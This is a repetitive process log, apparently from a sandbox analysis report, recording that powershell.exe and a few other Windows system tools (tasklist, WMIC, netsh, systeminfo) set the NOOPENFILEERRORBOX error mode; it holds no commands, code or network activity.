    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
